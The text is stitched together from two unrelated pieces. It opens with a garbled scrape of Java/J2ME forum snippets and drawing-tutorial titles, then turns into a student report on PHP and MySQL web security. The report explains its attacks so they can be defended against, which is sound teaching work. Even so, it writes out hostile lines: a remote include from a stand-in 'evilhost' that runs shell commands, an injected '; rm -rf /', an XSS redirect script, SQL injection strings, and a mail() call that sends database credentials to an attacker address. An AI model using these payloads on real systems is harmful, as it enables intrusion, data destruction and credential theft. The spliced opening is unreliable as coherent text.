public class starn...(" ");
}}}
please draw this pattern with explation i.e for understand loop
draw this pattern of swastic.
draw this pattern of swastic. last time i had asked swastic pattern... ,
example
*
**
***
****
*****
public class starn...(" ");
}}}
please draw this pattern with explation i.e for understand loop
How to draw globe, draw globe, globe
How to draw globe
... has been done in this example so just go through this for better understanding.
New File: Start by taking a new document.
Draw Circle: Choose any color
J2ME Books
;
Wireless
Java Programming with J2ME
Perfect...
J2ME Books
Free
J2ME Books
J2ME programming camp
How to draw a house, draw a house, a house
How to draw a house
Use this example to draw a house in the
photoshop, it has been made an easy example to learn beginners.
New File: Create a new file.
Draw different curves with QuadCurve2D
Draw different curves with QuadCurve2D
This section illustrates you how to draw different... parametric curve segments. We are providing you an
example which shows different
Arc MIDlet Example
Arc MIDlet Example
In the previous draw arc example, we have explained how to draw an arch on
the screen. But in this example we are going to show how to draw arc
How to draw a wall, draw a wall, a wall
How to draw a wall
Now we are going to teach you to draw a real wall by the photoshop, it is
very easy by my this example.
Select color: First take a new document and choose
J2ME Icon MIDlet Example
J2ME Icon MIDlet Example
In this example we are going to create icon list of different...;SimpleSlidingCanvas canvas;
public void startApp
Creating Menu Using Canvas Class
Creating Menu Using Canvas Class
This example shows how to create the menu and call the canvas class to show
the toggle message. The Toggle message will appear when
PHP GD Draw Rectangle
PHP GD draw text
Draw Grids
Draw Grids
This section illustrates you how to draw grids.
To draw the grids, we have...;
Now create a canvas and add it to the frame by the following code image application
j2me image application i can not get the image in my MIDlet .........please tell me the detailed process for creating immutable image without Canvas class
How to draw a soccer boll
How to draw a soccer boll
Draw a soccer boll by using this example, It will
teach you a simple way to make it just follow now.
New...; .
Polygonal Shape: Draw a shape with Black
color
Image Item Using Canvas Example
Image Item Using Canvas Example
This example is will show you how to create the image at the top center of the screen. The following are the methods used
How to draw a circle bucket, draw a circle bucket, circle bucket
How to draw a circle bucket
This example has a simple way to learn easily to make a
circle shape... style: Go to Layer menu > Layer style
> Bevel and emboss.
Draw Circle
PHP GD draw line KeyEvent Example
J2ME KeyEvent Example
... value.
In this example we find the key value and print it on the console as like...;keyCanvas = new Canvas(){
public void
How to draw a web button, draw a web button, web button
How to draw a web button
Be ready to learn a simple technique to draw a web
button, if you are not able to make a web button follow every steps that are give
in this example
Draw Pie Chart
Draw Pie Chart
This Java Pie Chart example is going to show you how to draw Pie Charts in
Java.
This Java Pie Chart example is drawing a pie chart to show
Perfect Numbers - Java Beginners
Perfect Numbers The number 6 is said to be a perfect number because it is equal to the sum of all its exact divisors (other than itself).
6 = 1 + 2 + 3
Write a java program that finds and prints the three smallest perfect
j2me tutorials - Java Beginners
j2me tutorials j2me paint()
definitions Hi Friend,
Canvas class has defined paint(Graphics g) method to be abstract. This method performed All the drawings on the Graphics object.
For examples, Please
Canvas placing problem
Canvas placing problem how to place a canvas in swt under a toolbar
J2ME Video Control Example
J2ME Video Control Example
... of video control is
used to controls the display of video. In this example we...;display.setCurrent(canvas);
player.start();
}
Draw Statistical chart in jsp
Draw Statistical chart in jsp
This section illustrates you how to draw statistical chart in jsp by
getting values from database..
To draw a bar chart, we have
how to draw a table on jframe in java - Java Beginners
how to draw a table on jframe in java how to draw a table on jframe in java? Hi friend,
import java.awt.*;
import...://
Thanks
J2ME count character into string i am new in J2ME, my problem is how... and got nothing...some one plz give me a punch :)
as an example,
1. i got a text...
J2ME
J2ME PROGRAM TO CONNECT WITH MS-ACCES HI
WRITE A J2ME PROGRAM TO CONNECT WITH MS-ACCESS.(CREATING DATABASE)
THANKS | http://www.roseindia.net/tutorialhelp/comment/92367 | CC-MAIN-2014-52 | refinedweb | 2,350 | 60.45 |
First time here? Check out the FAQ!
Hello Guys,
I`m new to Hibernate and JPA.
I have an Axon.Ivy project that has couple of Entity Classes.
I want to move them in a separate project and separate namespace(package) and also to add some additional fields.
What are the implications when I`m changing the data model and the namespaces ?
How do I migrate the changes to the production server ?
In .Net Entity Framework there is a concept of 'migrations' where the changes to the database are applied automatically when the code is deploys.
Best Regards,
Yordan Yunchov
asked
06.07.2016 at 10:08
Stelt0
19●33●37●42
accept rate:
12%
Once you sign in you will be able to subscribe for any updates here
Answers
Answers and Comments
Markdown Basics
learn more about Markdown
persistence ×32
migration ×10
dataclass ×9
Asked: 06.07.2016 at 10:08
Seen: 1,090 times
Last updated: 06.07.2016 at 10:08
How can I add a List to a database
Avoid MultipleBagFetchException when referencing multiple collections of another type
Switching the environment to a new physical hardware
How to persist fields in ivy repo but not index in elastic?
NoSQL In Axon.Ivy
How can i persist a file as BLOB?
How can i save bytearrays via the entityclass in a database?
Enums in Entity Classes
Ivy data class persistence: Make the java class’s attribute transient?
Persistent object has been deleted | https://answers.axonivy.com/questions/1872/entity-class-migrations | CC-MAIN-2020-29 | refinedweb | 245 | 67.15 |
logging
<p.</p>
This video has three files. To run it from the command line you
need to be sure that you're in a virtualenv that has
pandas installed.
job.py
import sys from summarise import summary if __name__ == "__main__": # this line will grab the ticker argument ticker = sys.argv[1] # this line will take the ticker and do the analysis print(f"The average stock price is {summary(ticker)}")
summarise.py
from fetch import download_data def summary(ticker): dataf = download_data() return dataf[ticker].mean()
fetch.py
import pandas as pd def download_data(): url = '' reutrn pd.read_csv(url)
You'll notice that everything runs fine when we run;
python job.py KLM
But things go wrong when we run;
python job.py GOOG
The debugging could be made easier if we had logging around. Sure, we could also use the python debugger but logging is a good habbit either way. In this series of videos we're going to explain how to set it up. | https://calmcode.io/collections/logging.html | CC-MAIN-2020-40 | refinedweb | 166 | 66.33 |
IMT4161
Information Security
and Security Architecture
Autumn Term 2004
MSc in Information Security
Creating secure websites
in PHP and MySQL
Mats Byfuglien, mats@byfuglien.net
Norwegian Information Security Laboratory – NISlab
Department of Computer Science
and Media Technology
Gjøvik University College
P.O. Box 191, 2802 Gjøvik, Norway
Creating Secure W
e
bsites in PHP and MYSQL
Abstract
PHP in combination with MySQL, is the one of the most common ways of creating web
applications. The reason for this is that PHP is a very feature rich language.
Since all web applications created in PHP are publicly available for everyone with an internet
connection, the security aspect is very important.
The problem is that web applications have a short development time, and the implementation is
often done by web designers, not by programmers. This often leads to the fact that security
aspects are forgotten or overlooked, because they don’t have the right mindset.
This report deals with some of the most common attacks on PHP sites, such as XSS, SQL
injection, site defacement, session attacks etc. I will also discuss some of the common
errors/misunderstandings done by the developers, and present some approaches on how to make
your PHP application more secure. This includes both configuration settings in PHP and
functions/features provided by PHP.
The report also includes a chapter on MySQL and security issues concerning communication
between PHP scripts and the database.
- 1 -
Creating Secure W
e
bsites in PHP and MYSQL
T
ABLE OF
C
ONTENTS
1
I
NTRODUCTION
....................................................................................................3
1.1 W
HAT IS
PHP?.................................................................................................3
1.1.1 PHP
S
TRENGTHS
…...……….…………………………..………………....3
1.2
W
HY
S
ECURING
PHP
IS IMPORTANT
..................................................................3
2 A
LWAYS VALIDATE YOUR DATA
..........................................................................4
2.1 R
ISKS AND
S
OLUTIONS
.....................................................................................4
2.1.1
R
EGISTERED
G
LOBALS
…………...……...…………………………………5
2.1.2
F
ILES AND
C
OMMAND
………………………………………………………6
2.1.3
XSS:
C
ROSS
S
ITE
S
CRIPTING
………………………………………………...8
2.2
V
ALIDATION APPROACHES
................................................................................9
3 M
Y
SQL...........................................................................................................10
3.1 W
HAT IS
M
Y
SQL...........................................................................................10
3.2
SQL
I
NJECTION
...............................................................................................10
3.3
A
CCESSING
M
Y
SQL
FROM
PHP
SAFELY
..........................................................12
3.4 PEAR
DB......................................................................................................12
4 S
HARED
H
OSTS
................................................................................................13
5 S
ESSIONS
..........................................................................................................14
5.1
W
HAT ARE SESSIONS
........................................................................................14
5.2
S
ESSION
S
ECURITY
..........................................................................................14
5.3
C
REATE YOUR OWN SESSION CONTROL
............................................................15
6 E
RROR
H
ANDLING
...........................................................................................16
7 C
ONCLUSIONS
..................................................................................................17
R
EFERENCES
.........................................................................................................19
- 2 -
Creating Secure W
e
bsites in PHP and MYSQL
1 Introduction
1.1 What is PHP?
PHP is a server-side scripting language designed specifically for the web, and is mostly used for
creating dynamic web-sites. PHP code is embedded in ordinary HTML files. The code is parsed
and executed on the server, and the output from the script is ordinary HTML. The finished
HTML page is sent to the user’s browser.
PHP was conceived in 1994, by Rasmus Lerdrof. Afterwards the project was adopted by other
very talented people and has gone through three major rewrites in order to bring us to the mature
product PHP is today.
PHP is an open source product, this means that you don’t have to pay any licence for using PHP;
this is also one of the main reasons for its popularity.
Originally PHP stood for Personal Home Page, but was changed in line with the GNU recursive
naming convention (GNU = GNU is Not UNIX) and now stand for PHP Hypertext Preprocessor.
1.1.1 PHP Strengths
Some of PHP’s competitors are Perl, ASP ( Active Server Pages from Microsoft ), JSP ( Java
Server Pages and Allaire ColdFusion. In comparison to these products, PHP has many strengths;
some of these are listed below.
High Performance
PHP is very efficient, and can server millions of hits per day; even on an inexpensive server.
Database integration
PHP has built in support to many database systems including MySQL, Oracle, PostgreSQL,
filePro, Hyperware, Informix, Interbase and Sybase.
Built in Libraries
PHP contains a huge number of built in functions; like sending e-mail, generating images on the
fly, uploading files etc. This makes PHP a very convenient language for the programmer.
Cost
PHP is free to use.
Portability
PHP is available for many different operating systems. This means that it is possible to write
source code on a UNIX based system, and the code will usually work without modifications on a
different platform, such as Microsoft Windows.
1.2
Why Securing PHP is important
PHP is one of the most common languages for creating dynamic websites. In July 2004, PHP
was in use on more than 16 million domains world wide. This vast number of sites combined
with the fact that PHP sites are available to everyone with internet access, makes them very
exposed to attacks. Therefore, securing PHP sites becomes extremely important.
- 3 -
Creating Secure W
e
bsites in PHP and MYSQL
It’s important that everyone connecting a server to the internet (not only PHP servers), take the
proper security measures. Not doing this can lead to loss of data or even money, if the attackers
has their way.
When securing web-applications, there are two phrases that are important. The first is “Don’t
trust the network”. This means that any data sent to your site via a network – be a URL, data
from an HTML form, or any other kid of data - should be treated as potentially hazardous.
The second phrase is “Minimize the damage”. Even if you think your site is totally secure, there
is always a chance of somebody discovering vulnerabilities. Once this vulnerability has been
exploited, it’s important that you try to minimize the damage an intruder can cause. These two
phrases should always be in the mind of PHP developers at all times.
When visitors come to your site, they trust that it contains valid information, which is not
harmful to them or to their computer, and that any information they provide to the site will be
handled properly. Interacting with a site, whether an e-business, recreational or informational site,
involves certain security risks for a visitor. As a site designer, it’s your responsibility to protect the
visitor from these risks.
In order to build secure applications, it’s important that developers acknowledge that security is a
fundamental component of any software product. And that security must be incorporated in the
software as its being written. This is much easier and more cost efficient then trying to fix
problems after they have been discovered
Today most web applications have very short development time. This gives the developers barely
enough time to complete the basic functionality of the application, and very little time to
implement security measures. Another problem is that many PHP applications are developed by
web designers - and not by programmers – who might not have the right mindset, i.e. focus on
functionality and not security.
There are a lot of people on the internet trying to make a name for themselves by breaking your
code, crashing your site, posting inappropriate content etc. It doesn’t matter if you have a small
or large site; you are a target simply having a server that can be connected to. By using some of
the techniques described in this report, you can prevent your site from becoming a victim of the
attackers.
2 Always validate your data
2.1 Risks and Solutions
The most common and most severe security vulnerabilities in PHP scripts, and indeed any web
application, are poorly validated user input. Many scripts use information the user has provided,
and process this information in various ways. If this input is trusted blindly, the user has the
potential to force unwanted behaviour in the script and the hosting platform.
There are several ways of doing this. The simplest method is some kind of form spoofing, like
site defacement. Where a user enters HTML code into an input form, and completely alters the
layout of your site. More advanced injection techniques include uploading malicious files, running
command on the server, running programs on the server, SQL injection, redirection to other sites
etc.
- 4 -
Creating Secure W
e
bsites in PHP and MYSQL
In the following sections I will describe some of the most common attacks/vulnerabilities on
sites with poor validation, and how to solve these problems.
2.1.1 Registered Globals
Variables in PHP don’t have to be declared. They are automatically created the first time they are
used. PHP variables doesn’t have to be of a specific type either, they are typed based on the
context in which they are used. This extremely convenient from a programmers perspective, but
is has some drawbacks from a security standpoint.
Because of this convenience, PHP variables are rarely initialized by the programmer.
The main function of most PHP applications is usually to take in some user input (form
variables, session variables, cookies, uploaded files etc), process the input and return output
based on the input. In the PHP.ini file there is a directive called registered globals. If this is set to
on, you can access all kinds of input variables by just referring to their name. For example could
the variable
$_POST [“message”]
, posted from an HTML form, be accessed by the variable
. This is also possible with all other types of input variable like
$_SESSION
,
$_COOKIE
,
$_GET
etc. Having registered globals turned is extremely convenient for the developer, but
imposes a serious security risk.
Since all variables in PHP are defined globally, there is simply no way to trust any variable,
whether external or internal. Consider the following script:
<?php
$tempfile = “test.tmp”;
//do something with test.tmp here
unlink(“test.tmp”);
?>
Even if you handle test.tmp safely all the way through the script, the last statement could be very
dangerous. A malicious attacker can create an HTML form looking something like:
<input type=hidden name=”tempfile” value =”../../../etc/passwd”>
When this is submitted to the script, PHP will insert the field name in the global namespace as
$tempfile
. This attack is still a bit unlikely, because it would require the web server to run as
superuser, and if that is the case, you have a serious vulnerability that should be fixed immediately
(the web server should always run with only the necessary privileges ).
Another example of misuse with registered globals enabled is the following script:
<?php
If( authenticated_user() ){
$authorized=true;
}
If($autorized){
Include “/higly/sensitive/data.php”;
}
Because
$authorized
is not initialized as false, it’s possible to use something like a GET request
to compromise the script. This could be done by typing the URL of the script and add the
parameter
?authorized=
1 and you would be authorized to view the secret data.
The best way to prevent this is by disabling registered globals - which is default from version
4.2.0 of PHP. But there are few servers doing this, because a lot of third party applications use
this feature, and disabling it will limit their usage.
Another way of preventing this problem is by checking if the variable is in the arrays
or
$_GET
, and if they are, echo an error report to the user.
- 5 -
Creating Secure W
e
bsites in PHP and MYSQL
The absolute best way to work around the problem with registered globals is to code your scripts
in a matter where it doesn’t matter if registered globals are turned on or off. This will also make
your application more portable between servers with different configurations.
The easiest way to accomplish this is never to refer to variables just by their name. Always code
like registered globals is turned off. When you want something from a GET request use the
$_GET
array, and when you want something from a POST request use the
array.
COOKIE and SESSION variables also have similar arrays.
In addition to all this, disabling registered globals encourages developers to be mindful of the
origin of data, and this is an important characteristic of any security-conscious developer.
2.1.2 Files and Commands
The web server knows that a file is a PHP file by looking at the file extension. If the extension is
.php the server lets PHP interpret the file and then display the result. On the other hand if the
server doesn’t recognize the file extension, it will normally just display the content of the file in
plain text. Sometimes it happens that a PHP script needs to include other files as part of itself. A
lot of programmers have the tendency of naming these files with an .inc extension. The problem
here is that the server is not aware that those files should be viewed as PHP files. An attacker
could just type the URL of the .inc file, such as
and get the opportunity to study the code for security holes and maybe even see secret hard-
coded data. The easiest way to prevent this is to name all include files with a php extension, like
somefile.inc.php. This will force the server to interpret the file instead of just displaying it.
When doing this, another problem arises. The attacker is still able to type to URL of the file; this
will cause some code to be run out of context. Most of the time this is not a very serious
problem, since most include files consists mostly of variables assignments. Still it is an
unnecessary risk to allow code being executed out of context because you never know what
errors or states this may lead to.
Another approach is to prevent all .inc files from being displayed. This has to be done in the
configuration file on the web server. In the Apache server this is done in the httpd.conf file and
would look something like:
<Files ~ “\.inc$”>
Order allow, deny
Deny from all
</Files>
The safest thing to do would probably be to place all the .inc files outside the Document Root
and change the directive
include_
path in the php.ini file. This way only your PHP scripts will be
able to access these files. The web server, or any user, will no be able to access these files. This
might however be a problem when you are running your PHP scripts on a sheared server.
Because you might not be allowed to place files outside the document root.
Another security problem in PHP is the ability to open external files. PHP has several functions
that allow this. Some of them are:
include(),
require(),
require_once()
and
include_once()
.
These functions take a filename as parameter, read the file and parse it as PHP code. Typically
these functions are used to include common bits of PHP code stored in external files. Take the
following PHP code:
<?php include($libdir . “/languages.php”);?>
$libdir
is actually a configuration variable meant to be set earlier in the script to the directory
where the library files are stored. An attacker can cause this variable not to be set in the script,
and submit it himself instead. This means that the attacker is able to set the path. At first glance
this doesn’t seem like a big threat, since the attacker only is allowed to access a file name
- 6 -
Creating Secure W
e
bsites in PHP and MYSQL
languages.php. But since PHP has the ability to include code from other servers and run this as a
part of the original script, there is no telling what languages.php may contain.
Let’s say that the attacker’s version of languages.php contains the following:
<?php passthru(“/bin/ls etc”);?>
And the attacker sets
$libdir
to
. When the PHP interpreter
encounters this statement, it will make an http request to evilhost, retrieve the code and execute
it, returning a list of /etc to the attacker’s web browser.
File upload is another feature in PHP that actually makes life easier for an attacker. A PHP site
that allows file upload normally presents the user with a form that allows him to select a file from
his local machine, and then upload it to the remote web server. This feature is very useful, but it’s
PHP’s response that makes this it a bit dangerous. PHP will automatically receive the file from
the user, even before it has begun to parse the script, and then check if the file is smaller then the
$MAX_FILE_SIZE
variable set in the PHP configuration file.
This means that a user can send any file they wish to a PHP enabled machine, and before a script
has even specified whether or not it accepts file uploads, that file is saved on the local disk.
Let’s consider a script designed to receive file uploads. When the file is uploaded it’s stored in
location specified in php.ini file ( default is the /tmp directory ) with a random filename such as
phpxdfGGHEc. Next the PHP script needs some information about the uploaded file in order
to process it. PHP sets four global variables to describe the uploaded file:
$test
= filename on the server ( the variable name test comes from the name of the input field
in the form shown in the users browser ).
$test_size
= file size in bytes
$test_name
= the name of the file on the users computer
$test_type
= mime type of the uploaded file
When these variable are set, PHP start working on the file, via the $test variable. The only
problem is that this variable doesn’t have to be set by PHP. Say an attacker enters the following
URL:
name=test.txt&test_type=text/plain
(another possibility is to crate a from with four text
fields with these names, and submit this form to the PHP script), which will result in the
following variables being set:
$test = “include/config.php
$test_size = 10240
$test_name = “test.txt”
$test_type = “text/plain”
These variables are exactly what the script expects to be set by PHP, but instead of working on
an uploaded file, the script is actually working on the configuration for the application. This can
lead to the exposure of sensitive data like access credentials to the database.
Newer versions of PHP provide different methods for verifying the uploaded files. For example
all files uploaded to the server are stored in the HTTP_POST_FILES array. If you make it
common practice to check that all uploaded files are in this array, the attack described above will
be a lot harder to perform. PHP also provide a function that determines whether a particular file
is actually the one uploaded.
A creative attacker can also use file upload to run commands on the server. Take the following
piece of code:
<?php
if( file_exists( $theme )) // file must be on local server, no remote files
include($theme);
?>
Since this script prevents remote files being included and executed the attacker has to find and
alternative way of achieving his goal. What the attacker need is to get PHP code he has written
- 7 -
Creating Secure W
e
bsites in PHP and MYSQL
into a file on the server. Ultimately file upload will assist the attacker in doing this. For example
an attacker can use the file containing the passthru code shown earlier and submit this file to the
PHP script via file upload. PHP will then be kind enough to save the file and set
$theme
to the
location of the file. Now the file exists check will succeed and the file will be executed. When the
attacker has command execution ability on the server, he usually wants to escalate his attacks.
Once again file upload makes this possible. The attacker can simply upload all the attack tools he
needs to the server and use his code execution ability to run them.
Another possible security risk in your PHP scrip, due to poor validation, is when you run system
commands with user input as parameters. As an example, take the following script that returns
the UNIX finger information for a user:
<?php if( IsSet($_POST[“username”])) ?>
<h1>Result for <?php echo $username: ?></h1>
<p><?php system(“finger “ . $username ); ?></p>
This script works fine if the user is friendly and just enters a valid username. But there is a serious
flaw in this script. In UNIX it’s possible to run multiple commands on one line separated by the ;
operator. A malicious user can then use this to execute an attack on the server. For example if the
user enters “; rm –rf /” as his username. This will result in all the files on the server being
deleted.
PHP presents a good solution to this problem. The function escapeshellcmd() will make any
string safe to use in command execution, by removing any special characters like the semicolon.
There is also a similar function called escapeshellcmd() which makes arguments passed to a
particular commands safe by adding single quotes to it so it’s treated as a single safe argument.
2.1.3 XSS: Cross Site Scripting
Cross site scripting is one of the most common attacks on Web applications. XSS typically has
three main characteristic: Exploit the trust a user has in a particular site, involves web sites that
displays foreign data and injects content of the attackers choosing, due to poor validation. Any
site that displays data that comes from a foreign source without properly filtering it, are
vulnerable to XSS. Foreign data can be anything from user input to banner advertisement and so
on.
On of the most common types of XSS attacks are site defacement
A common way to deface a poorly designed website is to input HTML tags in an input form.
Consider the following PHP script for a simple guestbook:
<?php if(IsSet($_POST[“message”]))
// save message in database
?>
<HTML><HEAD></HEAD>
<h2>Enter a message to my guestbook:</h2>
<form action = “guestbook.php” method = “post”>
<textarea cols="30" rows="6" name="message"></textarea>
<input type = “submit” name = “submit” value = “Send message”>
</form>
//get data from database
//For each post in result set
<p><?php echo $message; ?></p>
</HTML>
If you have implemented your guestbook somewhat like this, you should feel a bit uneasy. This
script doesn’t do any validation of the data at all. This is a good time to remember the phrase
“Don’t trust the network”.
- 8 -
Creating Secure W
e
bsites in PHP and MYSQL
The script displays a textarea where the user can type his message. When the user submits the
message it’s stored directly in the database, and all the saved messages are displayed under the
input form.
Imagine what could happen if a malicious user stumbled over this scrip. The simplest thing he
could do is to insert HTML tags in the message, for example a large table filled with bogus data,
an extremely wide image etc. An attacker also uses this technique for leaving his calling card, so
that he can prove his attacks.
This is the embarrassing part of site defacement. It doesn’t cause any harm, except to make your
site look really bad.
Another, and much worse part of site defacement is when the attacker uses this to take advantage
of the users trust in the site. Say that the attacker puts this in the textarea:
<script language=”JavaScript”>
window.location=”
”
</script>
When the next visitor loads the guestbook, the browser will receive this tag and immediately
begin loading the hacked site. If the site with the guestbook is part a large PHP site which
requires a username and password, the attacker could make “evilsite.com” look exactly like the
original site and prompt the user for his password, or in the worst case; get the users credit card
number.
The problem can easily be solved. PHP has a built in function called
htmlspecialchars()
.
This function takes a string a parameter and turns all characters that has special meaning in
HTML and converts them to HTML entities. If you have an input string like
<script language=”JavaScript>….</script>
, this will be converted into
<script
language="JavaScript">…</script
. Other similar functions are
strip_tags()
and
htmlentities()
.
This simple feature will remove a serious security threat in your script. It’s wise to run this
function before further using any user submitted data.
2.2
Validation approaches
When it comes to validating data in PHP there are some general approaches that should be
followed.
Number one, never use variables you haven’t validated. The best way to do this is to use a clean
variable approach. For example consider the following script which ensures that the variable
“color” (from the
array) is either red, green or blue, and the variable “num is an integer:
<?php
$clean = array();
switch($_POST[‘color’]){
case ‘red’: case: ‘green’: case: ‘blue’: $clean[‘color’]=$_POST[‘color’];
break;
}
if($_POST[‘num’]==strval(intval($_POST[‘num’]))) {
$clean[‘num’] = $_POST[‘num’];
}
?>
With an approach like this you can consider all the variables outside the clean array to be tainted.
This is what’s called a whitelist approach, which is the exact opposite of a blacklist approach.
When it’s comes to validation of data, the whitelist approach is clearly the safest because unless
the data can be proven valid it’s considered invalid.
- 9 -
Creating Secure W
e
bsites in PHP and MYSQL
Regular expressions are a good way of reinforcing a whitelist approach. The following regular
expression validates an e-mail address:
‘/^[^@\s]+@([-a-z 0-9]+\.)+[a-z]{2,}$/i’
Creating your own regular expressions, which filters in characters allowed, is a much safer
approach than filtering out all the bad characters. Because when you filter out, there is always a
chance of missing something, and the filters often get very complicated.
One problem with the white list approach is that you may risk rejecting something that is actually
valid (false rejection). For example the name O’Hara might be rejected in a filter that checks user
names, because of the single quotation mark - even though it is valid.
From a security standpoint, false rejection is better than false acceptance (allowing something
invalid as valid) which you may risk with a black list approach.
3 MySQL
3.1 What is MySQL
MySQL is a very fast and robust relational database management system (RDBMS ). A database
enables you to store, search, sort and retrieve data efficiently. The MySQL server controls access
to the data, ensures that multiple users can work with it simultaneously and that only authorized
users gets access. Hence MySQL is a multi-user, multi-threaded server. It uses SQL (structured
query language), the standard database query language world wide. MySQL has been publicly
available since 1996, but started development already in 1979. MySQL is available under an Open
Source license, but there are also commercial licenses available.
3.2
SQL Injection
SQL injection is a technique for exploiting web applications that use client-supplied data in SQL
queries without first stripping potential harmful characters. This type of attack is very simple to
protect against, but there are still a lot of sites vulnerable.
When an attacker has discovered that your site is vulnerable to SQL injection, it’s only the
attackers SQL knowledge limiting the damage he can cause. The attacker is free to extract, insert,
modify and even delete content from the database.
Hackers typically test for SQL injection vulnerabilities by sending input that would cause the
server to generate an error message. If an error message appears, it would mean that the server
executed the query with the user appended input. By examining these error messages, it’s possible
for an attacker to figure out the original SQL query.
A simple form of SQL injection attack is bypassing logon forms. Consider the following select
statement in a PHP script:
SELECT username FROM users WHERE username = ‘$_POST[“username”]’ AND
password = ‘$_POST[“password”]’
If this statement returns one username, the logon has succeeded. But there is a serious flaw here.
The data submitted from the user is not sanitized, but directly inserted into the statement. Say an
attacker enters the following into the log-in form:
Username:
jackB
“ ’ OR ‘’ = ‘
The query sent to MySQL would look something like:
SELECT username FROM users WHERE
username = ‘jackB’ AND password = ‘’ OR ‘’=‘’
Instead of evaluating the password, the query will check if an empty string equals another empty
string. This will always be true, thus allowing a user to log in without a valid password.
- 10 -
Creating Secure W
e
bsites in PHP and MYSQL
The same approach could be used with an insert command. Take the following SQL query:
INSERT INTO users (username, password, email) VALUES (‘$_POST[“username”]’,
‘$rndpasswd’, $_POST[“email”]’)
This query is part of a script that creates a new user account. The user provides a desired
username and an e-mail address. The script then generates a random password and emails it to
the user to verify the address. Imagine that the user enters the following as a username:
Hacker’, ‘ownpasswd’, ‘’), (‘bobA’
and enters a valid e-mail address. If the password
generated by the script is: ghff56#, the SQL statement would look like:
INSERT INTO users (username, password, email) VALUES( ‘Hacker’,
‘ownpasswd’, ‘’), (‘bobA’, ‘ghff56#’ ‘valid@email.com’)
When this query is executed the application is tricked into creating two accounts. The first
account is created with a user supplied password, and no email address, enabling the attacker to
bypass the email verification.
A subcategory of SQL injection is “Blind SQL injection”. In ordinary SQL injection, error
reports from the server are studied in order to figure out how to attack the site. But in many
running systems, errors are not displayed only written to a log file. This makes it harder for the
attacker to inject SQL statements, but it is still possible. When testing for blind SQL injection
vulnerabilities, the attacker appends statements that are always true to the where clause.
Consider a script that fetches different press releases based on an ID sent as a parameter in the
URL. A URL that does this might look something like:
The application uses the SQL statement:
SELECT * from pressRelase where prID =
$_GET[‘prID’]
. The attacker can test if this script is vulnerable to SQL injection by requesting
the following URL:
AND 1=1
. If this query also returns the
press release, the application is vulnerable because part of the user supplied input is interpreted as
a condition. On a secure site this would not be possible because the user input would be treated
as a value. And the value
“6 AND 1=1
” is a string which would cause a type mismatch error in
the database and nothing will be displayed. This approach can be used to ask the database true or
false questions. Every time the application displays something, you know the answer is true. With
this approach, some time and patience, it’s possible to get almost any kind of information the
database.
SQL injection is very easy to defend against. The only thing you need to do is properly filter user
supplied data before executing the query. PHP provides several functions for this. The best
functions to use are
addslashes()
and
mysql_real_escape_string()
These functions escape all characters that can be dangerous. The first function adds backslashes
to characters that needs to be quoted. These characters are: ‘, “ and \. When run through the
addslashes function, the output will be \’, \” and \\. When these characters are escaped it’s not
possible to manipulate input statements as shown above. It’s important to remember to use the
stripslaches
function if you want to use the data on a later point. Otherwise the backslashes
will be shown in the output.
The
mysql_real_escape_string()
escapes characters like \n \r and null. If you use these
functions on all you SQL statements before executing them, your site should be protected against
SQL injection.
SQL injection is a large and comprehensive subject. I have only chosen some simple examples in
this report, to show the basic principle. If you want to know more about this I recommend Kevin
Spett’s articles called “SQL injection” and “Blind SQL injection” available at spidynamics.com
- 11 -
Creating Secure W
e
bsites in PHP and MYSQL
3.3 Accessing MySQL from PHP safely
The most common way of accessing MySQL from PHP is by having a file called something like
db.inc.php
which includes the following:
<?php
$host = ‘server.net’;
$username =‘myuser’;
$password=‘mypass’;
$db = mysql_connect($host, $username, $password);
?>
This file is included whenever a database connection is needed. An approach like this is very
convenient, and keeps all access credentials in a single file. Since the file is named with a .php
extension, there is no danger of the file being read through the browser. But an attacker might
still be able to access this file. Let’s say that there is a script on the server that doesn’t validate the
data correctly and uses user supplied data in the eval()function (which allows arbitrary PHP code
to be executed). An attacker can use this vulnerability to get your access credential by typing the
following as his argument:
mail(
hacker@illegal.com
, “Stolen credentials”,
‘include\db.inc.php’);
A solution to this, besides properly data sanitation, is to place the file outside the document root.
This might be a problem on sheared hosts, since other user accounts on the server still has access
to it.
The safest way of protecting your access credentials (described in the PHP cookbook) is to create
a path that only root can read. For example
/path/to/secret/stuff
. In this folder you place a
file with the following contents:
SetEnv DB_USER “myuser”
SetEnv DB_PASS “mypass”
And in the Apache httpd.conf file include:
Include “/path/to/secret/stuff”
Now you can use
$_SERVER[‘DB_USER’]
and
$_SERVER[‘DB_PASS]
in your scripts. And you
never have to type your username and password. In addition no one can write scripts that access
the file, since only root can read it. The only thing you have to be careful with, is not to expose
these variable with functions like
phpinfo()
and
print_r($_SERVER)
.
3.4 PEAR DB
PEAR is short for “PHP Extension and Application Repository”. The purpose of PEAR is to
provide a structured library of open-source code for PHP users. PEAR is partitioned into
packages. Each package is a separate project with its own development team. In this report I will
focus on the PEAR DB package (the complete PEAR manual is found at
phpfreaks.com/pear_manual/
). The PEAR DB package provides a unified API for accessing
SQL databases.
A script using PEAR DB might look something like:
<?php
Require_once( “DB.php” ); // include the PEAR DB package
$dbtype = “mysql”;
$dbserver = “localhost”;
$dbname = “test”;
$dbusers = “myuser”;
$dbpassword=”mypass”;
//build the connection string
$dsn=$dbtype.”://”.$dbuser.”:”$dbpassword.”@”.$dbserver.”/”.$dbname;
$db = DB::connect($dsn);
If(DB::isError($db))
die(“Error connecting to database”);
- 12 -
Creating Secure W
e
bsites in PHP and MYSQL
$db->setFetchMode(DB_FETCHMODE_ASSOC); //show result as associative arrays
$sql = “INSERT INTO guestbook ( ID, Name, Mail, Website, Message) VALUES(
?,?,?,?,?)”; //use wildcards for every parameter
$data = array(‘’, $_POST[“name”], $_POST[“mail”], $_POST[“website”],
$_POST[“message”]);
$prep = $db->prepare($sql);
$db->execute($prep, $data);
Echo “Your message has been successfully saved”;
?>
There are two main advantages with the PEAR DB package. Number one, it is database
independent. If this script where to communicate with another database, all you have to do is
change the
$dbtype
variable, everything else can remain the same. This is much more
convenient then using specific functions for each database.
The other advantage of PEAR DB is important from a security standpoint. When you create an
SQL statement, you have to possibility to use wildcard (the ? character) where the user submitted
values will be inserted. Then you provide an array with all the parameters. The SQL statement is
then prepared, and when you execute the statement all the parameters are automatically escaped
before being appended.
By using PEAR DB your scripts become more portable and you don’t have to remember using
escape functions every time you execute a query.
4 Shared Hosts
A huge number of people have purchased web hosting accounts on shared servers. On this
server there are many user accounts and a lot of them are running PHP applications. In an
environment like this, your data is very vulnerable. A general advice is to store sensitive data
outside the web tree. On a shared host this is not an option, because you are only allowed to save
files in the folder which belongs to your account. Even so, the approach of storing outside the
root only prevents the files from being read by the web server program. It is still possible to
access the files by other means such as a PHP written by another user sharing the same server.
